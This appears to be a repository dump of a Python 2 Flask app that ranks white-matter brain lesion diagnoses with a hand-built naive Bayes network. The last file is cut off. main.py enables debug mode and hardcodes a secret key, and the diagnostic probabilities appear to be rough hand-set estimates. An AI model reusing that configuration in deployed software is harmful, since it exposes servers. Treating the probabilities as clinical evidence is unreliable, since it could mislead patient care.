print(svm_clf.predict([[4.9, 1.6]]))\n# joblib.dump(svm_clf, 'iris.pkl')\n"
}
] | 2 |
jeffduda/aries-app
|
https://github.com/jeffduda/aries-app
|
d0088979538f7d90e77cff59da23c43d2ab7e251
|
5609b9cd76581cef693c51ca7fde3b3a88bbda5b
|
b4a9efd203478b08bf6e11bf55c83cd54f37bd34
|
refs/heads/master
| 2023-05-13T23:15:09.312919 | 2023-05-03T18:26:45 | 2023-05-03T18:26:45 | 177,214,319 | 1 | 1 | null | 2019-03-22T21:59:42 | 2023-01-26T21:22:23 | 2023-05-03T18:26:45 |
Python
|
[
{
"alpha_fraction": 0.5744680762290955,
"alphanum_fraction": 0.7340425252914429,
"avg_line_length": 12.428571701049805,
"blob_id": "c8d3adfdaa16fc1714adc38234ac2763fc464866",
"content_id": "642db7b329e65ab577a1d530a45d5abbe69cc397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "Flask==2.3.2\nWerkzeug<0.13.0,>=0.12.0\nflask-bootstrap\nnumpy==1.22.0\nflask_wtf\nopenpyxl\npandas\n"
},
{
"alpha_fraction": 0.3350323736667633,
"alphanum_fraction": 0.5673781633377075,
"avg_line_length": 60.149349212646484,
"blob_id": "e40ce878460c20ac871df9baadc80da7915bd275",
"content_id": "19440efdd2d35728159c841b0d42904215e8d117",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9417,
"license_type": "no_license",
"max_line_length": 413,
"num_lines": 154,
"path": "/WhiteMatterNetwork.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "from easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\nimport numpy as np\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n\ndef WhiteMatterNetwork(): \n network = NaiveBayesNetwork(); \n\n dx = NaiveBayesNetworkNode('Diagnosis',['ADEM','Adrenoleukodystrophy','CADASIL','CNS_Lymphoma','High_Grade_Glioma','HIV_Encephalopathy','Low_Grade_Glioma','Metastatic_disease','Migraine','Multiple_Sclerosis_active','Multiple_Sclerosis_inactive','Multiple_Sclerosis_tumefactive','Neuromyelitis_Optica','PML','PRES','Susac_Syndrome','SVID','Toxic_Leukoencephalopathy','Vascular']) \n dx.category='Diagnosis' \n nDx = 19\n dx.priors = np.array( [0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.022,0.054,0.054,0.054]) \n network.add_node(dx) \n\n n = NaiveBayesNetworkNode('enhancementRatio',['Large','Small']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.6,0.2,0.2,0.5,0.6,0.2,0.3,0.4,0.2,0.4,0.2,0.5,0.3,0.2,0.2,0.5,0.2,0.2,0.3 ], [ 0.4,0.8,0.8,0.5,0.4,0.8,0.7,0.6,0.8,0.6,0.8,0.5,0.7,0.8,0.8,0.5,0.8,0.8,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Number',['Single','Multiple']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.4,0.5,0.1,0.4,0.8,0.5,0.9,0.3,0.3,0.2,0.2,0.3,0.5,0.3,0.3,0.3,0.2,0.5,0.3 ], [ 0.6,0.5,0.9,0.6,0.2,0.5,0.1,0.7,0.7,0.8,0.8,0.7,0.5,0.7,0.7,0.7,0.8,0.5,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('ventVol',['Enlarged','Normal']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.3,0.5,0.6,0.3,0.7,0.2,0.2,0.3,0.4,0.2,0.2,0.1,0.5,0.3,0.2,0.7,0.3,0.7 ], [ 0.8,0.7,0.5,0.4,0.7,0.3,0.8,0.8,0.7,0.6,0.8,0.8,0.9,0.5,0.7,0.8,0.3,0.7,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Chronicity',['Acute','Chronic']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.1,0.5,0.2,0.3,0.3,0.4,0.5,0.4,0.5,0.2,0.5,0.3,0.5,0.8,0.5,0.2,0.5,0.8 ], [ 0.3,0.9,0.5,0.8,0.7,0.7,0.6,0.5,0.6,0.5,0.8,0.5,0.7,0.5,0.2,0.5,0.8,0.5,0.2 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Susceptibility',['Yes','No']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.2,0.2,0.4,0.3,0.3,0.2,0.4,0.1,0.1,0.1,0.2,0.1,0.1,0.2,0.1,0.1,0.2,0.3 ], [ 0.8,0.8,0.8,0.6,0.7,0.7,0.8,0.6,0.9,0.9,0.9,0.8,0.9,0.9,0.8,0.9,0.9,0.8,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Enhancement',['Yes','None']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.8,0.7,0.2,0.9,0.9,0.2,0.4,0.9,0.1,0.9,0.1,0.8,0.3,0.5,0.7,0.2,0.1,0.2,0.5 ], [ 0.2,0.3,0.8,0.1,0.1,0.8,0.6,0.1,0.9,0.1,0.9,0.2,0.7,0.5,0.3,0.8,0.9,0.8,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Cortex',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.5,0.2,0.5,0.8,0.2,0.8,0.6,0.2,0.2,0.2,0.4,0.2,0.6,0.7,0.1,0.1,0.5,0.5 ], [ 0.8,0.5,0.8,0.5,0.2,0.8,0.2,0.4,0.8,0.8,0.8,0.6,0.8,0.4,0.3,0.9,0.9,0.5,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Symmetry',['Symmetric','Asymmetric']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.8,0.5,0.4,0.9,0.2,0.5,0.6,0.5,0.5,0.2,0.7,0.2,0.8,0.6,0.8,0.8,0.6 ], [ 0.5,0.2,0.2,0.5,0.6,0.1,0.8,0.5,0.4,0.5,0.5,0.8,0.3,0.8,0.2,0.4,0.2,0.2,0.4 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Age',['Old','Young','Adult']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.01,0.01,0.1,0.3,0.3,0.1,0.2,0.4,0.1,0.05,0.05,0.01,0.2,0.1,0.2,0.1,0.7,0.3,0.65 ], [ 0.75,0.7,0.4,0.1,0.3,0.5,0.4,0.2,0.5,0.7,0.7,0.8,0.4,0.5,0.5,0.6,0.01,0.3,0.05 ], [ 0.24,0.29,0.5,0.6,0.4,0.4,0.4,0.4,0.4,0.25,0.25,0.19,0.4,0.4,0.3,0.3,0.29,0.4,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Immunocompromised',['Yes','No']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.1,0.1,0.1,0.6,0.1,0.9,0.1,0.5,0.1,0.3,0.3,0.3,0.2,0.9,0.2,0.1,0.1,0.5,0.1 ], [ 0.9,0.9,0.9,0.4,0.9,0.1,0.9,0.5,0.9,0.7,0.7,0.7,0.8,0.1,0.8,0.9,0.9,0.5,0.9 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Diffusion',['Restricted','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.6,0.7,0.2,0.9,0.7,0.3,0.3,0.5,0.1,0.4,0.1,0.4,0.3,0.7,0.3,0.3,0.1,0.6,0.7 ], [ 0.4,0.3,0.8,0.1,0.3,0.7,0.7,0.5,0.9,0.6,0.9,0.6,0.7,0.3,0.7,0.7,0.9,0.4,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Anterior_Temporal',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.2,0.7,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.3,0.2 ], [ 0.8,0.8,0.3,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.7,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('CorpusCallosum',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.5,0.7,0.8,0.4,0.2,0.5,0.3,0.6,0.6,0.5,0.6,0.4,0.2,0.8,0.2,0.8,0.2 ], [ 0.5,0.2,0.5,0.3,0.2,0.6,0.8,0.5,0.7,0.4,0.4,0.5,0.4,0.6,0.8,0.2,0.8,0.2,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Periventricular',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.7,0.7,0.7,0.7,0.7,0.3,0.7,0.7,0.7,0.7,0.7,0.7,0.7,0.5,0.7,0.7,0.7,0.7 ], [ 0.3,0.3,0.3,0.3,0.3,0.3,0.7,0.3,0.3,0.3,0.3,0.3,0.3,0.3,0.5,0.3,0.3,0.3,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Sex',['Male','Female']) \n n.category = 'Clincal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.5,0.6,0.55,0.5,0.5,0.5,0.4,0.2,0.2,0.2,0.3,0.5,0.3,0.2,0.5,0.5,0.4 ], [ 0.5,0.2,0.5,0.4,0.45,0.5,0.5,0.5,0.6,0.8,0.8,0.8,0.7,0.5,0.7,0.8,0.5,0.5,0.6 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Prodrome',['Yes','No']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.2,0.2,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2 ], [ 0.5,0.8,0.8,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('T2',['Decreased','Increased','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01 ], [ 0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98 ], [ 0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('T1',['Decreased','Increased','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.3,0.4,0.4,0.5,0.4,0.4,0.6,0.3,0.45,0.6,0.35,0.4,0.3,0.6,0.4,0.5,0.4,0.5,0.4 ], [ 0.1,0.2,0.1,0.2,0.4,0.1,0.1,0.4,0.05,0.05,0.05,0.2,0.1,0.1,0.1,0.1,0.1,0.1,0.2 ], [ 0.6,0.4,0.5,0.3,0.2,0.5,0.3,0.3,0.5,0.35,0.6,0.4,0.7,0.3,0.5,0.4,0.5,0.4,0.4 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Mass_effect',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.1,0.1,0.5,0.9,0.1,0.5,0.5,0.1,0.1,0.1,0.4,0.1,0.2,0.1,0.1,0.1,0.3,0.2 ], [ 0.8,0.9,0.9,0.5,0.1,0.9,0.5,0.5,0.9,0.9,0.9,0.6,0.9,0.8,0.9,0.9,0.9,0.7,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Size',['Small','Large','Medium']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.3,0.2,0.2,0.2,0.1,0.2,0.15,0.3,0.7,0.5,0.7,0.1,0.3,0.1,0.1,0.3,0.2,0.1,0.1 ], [ 0.3,0.6,0.5,0.5,0.6,0.5,0.35,0.4,0.1,0.2,0.1,0.5,0.3,0.6,0.4,0.3,0.4,0.6,0.4 ], [ 0.4,0.2,0.3,0.3,0.3,0.3,0.5,0.3,0.2,0.3,0.2,0.4,0.4,0.3,0.5,0.4,0.4,0.3,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Lobar_Distribution',['Frontal','Temporal','Parietal','Occipital']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.25,0.2,0.4,0.25,0.4,0.25,0.4,0.25,0.4,0.25,0.25,0.25,0.25,0.4,0.05,0.25,0.25,0.25,0.4 ], [ 0.25,0.1,0.4,0.25,0.3,0.25,0.3,0.25,0.25,0.25,0.25,0.25,0.25,0.1,0.1,0.25,0.25,0.25,0.1 ], [ 0.25,0.35,0.1,0.25,0.2,0.25,0.2,0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.25,0.25,0.25,0.25,0.4 ], [ 0.25,0.35,0.1,0.25,0.1,0.25,0.1,0.25,0.1,0.25,0.25,0.25,0.25,0.1,0.6,0.25,0.25,0.25,0.1 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Juxtacortical',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.5,0.8,0.6,0.9,0.8,0.9,0.7,0.8,0.8,0.8,0.8,0.7,0.8,0.9,0.7,0.7,0.8,0.7 ], [ 0.3,0.5,0.2,0.4,0.1,0.2,0.1,0.3,0.2,0.2,0.2,0.2,0.3,0.2,0.1,0.3,0.3,0.2,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('lesionExtent',['Limited','Extensive']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.2,0.2,0.2,0.2,0.2,0.8,0.5,0.9,0.6,0.6,0.3,0.7,0.3,0.5,0.8,0.5,0.2,0.5 ], [ 0.5,0.8,0.8,0.8,0.8,0.8,0.2,0.5,0.1,0.4,0.4,0.7,0.3,0.7,0.5,0.2,0.5,0.8,0.5 ] ]).transpose() \n network.add_node(n) \n\n network.categories = ['Signal', 'Spatial', 'Clinical'] \n return network\n"
},
{
"alpha_fraction": 0.5716515183448792,
"alphanum_fraction": 0.5751625299453735,
"avg_line_length": 28.922178268432617,
"blob_id": "1b8182f515f1a386e745da461946ff303422a245",
"content_id": "7b27e031113cf1811070f722cfa3b2ea133ca27c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7690,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 257,
"path": "/main.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "# [START app]\nimport logging\n\n# [START imports]\nfrom flask import Flask, render_template, request\nimport flask\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField\nfrom wtforms.validators import DataRequired\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n#import numpy as np\nimport os\nimport imp\nimport csv\nimport copy\nimport time\nimport numpy as np\nfrom easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\nfrom WhiteMatterNetwork import WhiteMatterNetwork\n\nhasClosed = False\ntry:\n imp.find_module('BasalGangliaNetwork')\n hasClosed = True\n from BasalGangliaNetwork import BasalGangliaNetwork\nexcept ImportError:\n hasClosed = False\n# [END imports]\n\n\n\n\n# [START create_app]\napp = Flask(__name__)\napp.debug = True\napp.config['SECRET_KEY'] = 'aries-key'\n\napp.highlight = False\napp.highlightText = \"Highlight most discriminating features\"\n\napp.highlightTurnOn = 'Highlight most discriminating features'\napp.highlightTurnOff = ' Remove feature highlighting '\napp.setDxTitle = 'cleardx'\napp.hasClosed = hasClosed\n\napp.networks = [ 'White Matter' ]\nif hasClosed:\n app.networks.append('Basal Ganglia')\n\n\n\nBootstrap(app)\n# [END create_app]\n\n\ndef getPreviousFeatures( network, form ):\n previousFeatures = {}\n for k in form.keys():\n parts = k.split(\":\")\n if ( len(parts)==2 ) and (parts[0] == \"last\"):\n if network.has_node(parts[1]):\n previousFeatures[parts[1]] = form[k]\n return previousFeatures\n\ndef getNetwork( networkName ):\n if networkName == 'Basal Ganglia':\n return BasalGangliaNetwork()\n elif networkName == 'White Matter':\n return WhiteMatterNetwork()\n return None\n\[email protected]('/about')\ndef about():\n return render_template('about.html', page='about')\n\[email protected]('/', methods=['GET','POST'])\[email protected]('/index', methods=['GET','POST'])\ndef index():\n\n print('%%%% index %%%%')\n print request.method\n\n highlightText = flask.current_app.highlightTurnOn\n highlightOn = \"0\"\n\n lastDx = flask.current_app.setDxTitle\n setDx = ''\n\n # For setting all features by diagnosis\n features = request.form.to_dict()\n\n\n networkName = flask.current_app.networks[0]\n lastNetwork = networkName\n\n ignoreFeatures = False\n\n if request.method == \"GET\":\n print( \"*** GET action ***\")\n print(features)\n\n previousFeatures = {}\n\n if features.has_key('lastHighlight'):\n highlightOn = features['lastHighlight']\n\n if features.has_key('lastNetwork'):\n lastNetwork = features['lastNetwork']\n\n network = getNetwork( lastNetwork )\n\n dxList = network.get_node_states(\"Diagnosis\")\n\n if request.method == \"POST\":\n\n #print(features)\n\n\n print( \"*** POST action ***\")\n print( '--- Features ---')\n for k in features.keys():\n print( k + '=' + features[k])\n print( '--- End Features ---')\n\n if 'Network' in features:\n if features['Network'] != features['lastNetwork']:\n print(\"*** ACTION -> CHANGE NETWORK\")\n lastNetwork = features['Network']\n ignoreFeatures = True\n network = getNetwork(lastNetwork)\n dxList = network.get_node_states(\"Diagnosis\")\n\n if 'ClearDiagnosis' in features:\n print(\"*** ACTION -> CLEAR\")\n setDx = 'cleardx'\n ignoreFeatures = True\n\n if features.has_key('HighlightFeatures'):\n print(\"HighlightFeatures is present\")\n highlightAction = features['HighlightFeatures']\n if highlightAction == flask.current_app.highlightTurnOn:\n if highlightOn == \"0\":\n print(\"*** ACTION -> HIGHLIGHT ON\")\n highlightOn = \"1\"\n highlightText = flask.current_app.highlightTurnOff\n elif highlightAction == flask.current_app.highlightTurnOff:\n if highlightOn == \"1\":\n print(\"*** ACTION -> HIGHLIGHT OFF\")\n highlightOn = \"0\"\n highlightText = flask.current_app.highlightTurnOn\n for n in network.nodeMap.keys():\n network.nodes[ network.nodeMap[n] ].sensitive = ''\n else:\n if highlightOn == \"0\":\n highlightText = flask.current_app.highlightTurnOn\n elif highlightOn == \"1\":\n highlightText = flask.current_app.highlightTurnOff\n\n # Check if the 'SetDiagnosis' menu has changed\n if setDx == '':\n setDx = features.get('SetDiagnosis')\n lastDx = features.get('lastDx')\n if setDx != lastDx:\n print( '*** ACTION -> SET_DIAGNOSIS' )\n ignoreFeatures = True\n lastDx = setDx\n if ( setDx=='cleardx'):\n for n in network.nodes:\n network.clear_node_state(n.name)\n else:\n dxIndex = dxList.index( setDx )\n network.set_node_states_by_result( dxIndex )\n\n # Set all network FeatureSelect\n previousFeatures = getPreviousFeatures(network, features)\n\n\n if not(ignoreFeatures):\n for k in features.keys():\n parts = features.get(k).split(\":\")\n if network.has_node(k):\n state = ''\n if ( len(parts) > 1 ):\n network.set_node_state(k, parts[1] )\n state = parts[1]\n else:\n network.clear_node_state(k)\n\n if state != previousFeatures[k]:\n setDx = 'cleardx'\n lastDx = 'cleardx'\n print(k + \" changed from \" + previousFeatures[k] + ' to ' + state)\n\n\n\n print(\"solve network: \" + lastNetwork)\n sorted, mat = network.get_diagnoses(False)\n radSorted, radMat = network.get_diagnoses(True)\n\n dx = []\n dxRad = []\n\n maxDx = 10\n if len(sorted) < maxDx:\n maxDx = len(sorted)\n\n cumSum = 0\n for i in range(maxDx):\n cumSum += mat[sorted[i]]\n dx.append( (dxList[sorted[i]],mat[sorted[i]],cumSum) )\n\n cumSum = 0\n for i in range(len(radSorted)):\n cumSum += radMat[radSorted[i]]\n dxRad.append( (dxList[radSorted[i]],radMat[radSorted[i]],cumSum) )\n\n if highlightOn == \"1\":\n print('Calculating sensitivities')\n for cat in network.categories:\n #print(cat)\n nodes = network.names_of_nodes_in_category(cat)\n maxSens = 0\n maxName = ''\n for n in nodes:\n network.nodes[ network.nodeMap[n] ].sensitive = ''\n if network.nodes[ network.nodeMap[n] ].value == '':\n s = network.calculate_node_sensitivity(n, mat)\n #print( n + ' ' + str(s))\n if s > maxSens:\n maxSens = s\n maxName = n\n if maxName != '':\n network.nodes[ network.nodeMap[maxName] ].sensitive = 'sensitive'\n\n print('highlightOn = ' + highlightOn)\n\n return render_template('index.html',\n network=network,\n dx=dx,\n dxRad=dxRad,\n dxLength=len(dx),\n page='index',\n setDx=setDx,\n lastDx=lastDx,\n highlight=highlightText,\n highlightOn=highlightOn,\n networks=flask.current_app.networks,\n networkName=lastNetwork )\n\[email protected](500)\ndef server_error(e):\n # Log the error and stacktrace.\n logging.exception('An error occurred during a request.')\n return 'An internal error occurred.', 500\n# [END app]\n"
},
{
"alpha_fraction": 0.4959278404712677,
"alphanum_fraction": 0.5012452006340027,
"avg_line_length": 29.88565444946289,
"blob_id": "d675d447d63d21d4e057e400b48e99ed44a557b8",
"content_id": "f57e5741bdcbc209af33b4e569b65f3b47c0dd27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14857,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 481,
"path": "/easybayesy.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "\n# [START app]\nimport logging\n\n# [START imports]\n#from flask import Flask, render_template, request\n#import flask\n#from flask_bootstrap import Bootstrap\n#from flask_wtf import FlaskForm\n#from wtforms import StringField\n#from wtforms.validators import DataRequired\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n#import numpy as np\n#import os\nimport csv\nimport time\nimport numpy as np\nimport sys\n# [END imports]\n\n\n\n\nclass NaiveBayesNetworkNode:\n\n # Initializer\n def __init__(self, name, states):\n #self.name = name.replace('_', ' ')\n self.name = name\n self.states = states\n self.parent = ''\n self.category = ''\n self.menuStates = []\n self.menuStates.append(self.name)\n for s in self.states:\n self.menuStates.append(self.name+\":\"+s)\n self.value = ''\n self.menuValue = ''\n self.priors = np.ones(len(self.states))\n self.priors = self.priors / len(self.priors)\n self.probs = []\n self.hasChoice = ''\n self.sensitive = ''\n self.style = ''\n self.modified = time.time()\n\n\n def set_parent(self, node):\n self.parent = node.name\n\n def is_state_selected(self, menuChoice):\n if menuChoice == self.menuValue:\n return 'selected'\n return ''\n\n\n\nclass NaiveBayesNetwork:\n\n def __init__(self):\n self.filename = \"\"\n self.name = \"ExampleNetwork\"\n self.categories = [\"Signal\", \"Spatial\", \"Time\", \"Miscellaneous\", \"Clinical\"];\n self.nodes = []\n self.nodeMap = {}\n self.modified = time.time()\n\n # Set all node states to clear\n def reset(self):\n self.modified = time.time()\n for n in self.nodes:\n self.clear_node_state(n.name)\n\n def add_node(self, node):\n self.modified = time.time()\n self.nodes.append(node)\n self.nodeMap[node.name] = len(self.nodes)-1\n #print( node.name + str( len(self.nodes)-1 ))\n\n def has_node(self,name):\n return self.nodeMap.has_key(name)\n\n def get_node(self, name):\n if self.has_node(name):\n return self.nodes[ self.nodeMap[name] ]\n return None\n\n def get_node_states(self, name):\n if self.has_node(name):\n return self.nodes[ self.nodeMap[name] ].states\n return None\n\n def set_node_state(self, name, state):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n if state in self.nodes[n].states:\n self.nodes[n].value = state\n self.nodes[n].menuValue = self.nodes[n].name + ':' + state\n self.nodes[n].hasChoice = 'hasChoice'\n self.nodes[n].sensitive = ''\n else:\n raise Exception(\"Invalid state set: \" + state )\n\n def set_node_states_by_result(self, index):\n self.modified = time.time()\n for n in self.nodes:\n if n.name != 'Diagnosis':\n vals = n.probs[index,:].tolist()\n state = vals.index(max(vals))\n self.set_node_state(n.name, n.states[state])\n\n def clear_node_state(self, name):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n self.nodes[n].value = ''\n self.nodes[n].menuValue = ''\n self.nodes[n].hasChoice = ''\n else:\n raise Exception(\"Node does not exist: \" + name )\n\n def set_node_probs(self, name, probs):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n self.nodes[n].probs = probs\n else:\n raise Exception(\"Node does not exist: \" + name )\n\n def get_node_priors(self, name):\n if self.has_node(name):\n return( self.nodes[ self.nodeMap[name] ].priors)\n return None\n\n def get_node_category(self, name):\n if self.has_node(name):\n return( self.nodes[ self.nodeMap[name] ].category)\n return None\n\n def number_of_nodes_in_category(self,category):\n count = 0\n for n in self.nodes:\n if n.category == category:\n count = count + 1\n return count\n\n def names_of_nodes_in_category(self,category):\n names = []\n for n in self.nodes:\n if n.category == category:\n names.append(n.name)\n return names\n\n def nodes_in_category(self,category):\n nodes = []\n for n in self.nodes:\n if n.category == category:\n nodes.append(n)\n return nodes\n\n def read_csv(self, network_file):\n self.filename = network_file\n self.modified = time.time()\n\n diseases = []\n diseasePrior = []\n nodeNames = []\n nodeCategories = []\n nodeStates = []\n\n self.categories = []\n prob = []\n\n with open(self.filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n allNodeStates = row[2:len(row)]\n\n for n in allNodeStates:\n nodeParts = n.split(\":\")\n nodeCategories.append(nodeParts[0])\n nodeNames.append(nodeParts[1])\n nodeStates.append(nodeParts[2])\n\n for n in np.unique(nodeNames):\n states = []\n cat = ''\n for i in range(0,len(nodeNames)):\n if nodeNames[i] == n:\n states.append(nodeStates[i])\n cat = nodeCategories[i]\n node = NaiveBayesNetworkNode(n,states)\n node.category = cat\n node.parent = \"Diagnosis\"\n self.add_node(node)\n\n else:\n diseases.append(row[0])\n diseasePrior.append(row[1])\n rValues = row[2:]\n prob.append(rValues)\n\n\n line_count += 1\n\n prob = np.vstack(prob)\n\n for n in self.nodes:\n nMat = np.empty((len(diseases), len(n.states) ))\n for s in range(0, len(n.states)):\n for i in range(0,len(nodeNames)):\n if nodeNames[i] == n.name and n.states[s] == nodeStates[i]:\n nMat[:,s] = prob[:,i]\n\n self.set_node_probs( n.name, nMat )\n\n dNode = NaiveBayesNetworkNode(\"Diagnosis\", diseases)\n dNode.category = \"Diagnosis\"\n dNode.priors = diseasePrior\n self.add_node(dNode)\n self.categories = np.unique(nodeCategories)\n\n def calculate_node_sensitivity(self, name, currentProbs):\n\n if ( not(self.has_node(name)) ):\n return 0\n\n node = self.nodes[ self.nodeMap[name] ]\n val = node.value\n probs = self.get_node_priors(\"Diagnosis\")*0\n\n for v in range(len(node.states)):\n self.set_node_state(node.name, node.states[v])\n s, vProbs = self.get_diagnoses(False)\n probs += vProbs / ( currentProbs * node.probs[:,v] )\n probs[np.isnan(probs)] = 0\n\n if val == '':\n self.clear_node_state(node.name)\n else:\n self.set_node_state(node.name, val)\n\n sens = probs.sum()\n return sens\n\n\n def get_diagnoses(self, isRadiologic):\n mat = []\n if not(isRadiologic):\n mat.append(self.get_node_priors(\"Diagnosis\"))\n else:\n unityPrior = []\n dis = self.get_node_priors(\"Diagnosis\")\n for x in dis:\n unityPrior.append(1.0/len(dis))\n mat.append(unityPrior)\n\n for n in self.nodes:\n if (n.value != ''):\n if not(isRadiologic):\n idx = n.states.index(n.value)\n #print(n.name + ' ' + str(idx) + ' ' + n.value)\n #print(n.probs)\n #print( n.probs[:,idx])\n mat.append( n.probs[:,idx])\n elif (n.category != \"Clinical\"):\n #print(n.category + n.name)\n idx = n.states.index(n.value)\n mat.append( n.probs[:,idx])\n\n\n mat = np.vstack(mat)\n mat = mat.astype('double')\n mat = np.prod(mat, axis=0)\n mat = mat/np.sum(mat)\n sorted = np.argsort(mat)\n sorted = sorted[::-1]\n return sorted, mat\n\n\n def read_sheet(self, table_file, tableName):\n # tableDir = \"/home/jiancong/Desktop/projects/BayesNet/NaiveBayes/BasalGanglia/BG_Bayesian_network_NaiveBayes.xlsx\"\n # tableName = \"BGnetwork\"\n self.filename = table_file\n self.name = tableName\n self.modified = time.time()\n\n wb=openpyxl.load_workbook(table_file)\n worksheet = wb[tableName]\n\n #Read the keys\n rows = list(worksheet.rows)\n first_row = rows[0]\n second_row = rows[1]\n\n keys = [c.value for c in first_row]\n values = [c.value for c in second_row]\n\n values = [v for v in values if v is not None]\n keys = keys[:len(values)]\n\n values = values[1:]\n keys = keys[1:]\n\n key_value_dict = {}\n\n current_k = \"\"\n for 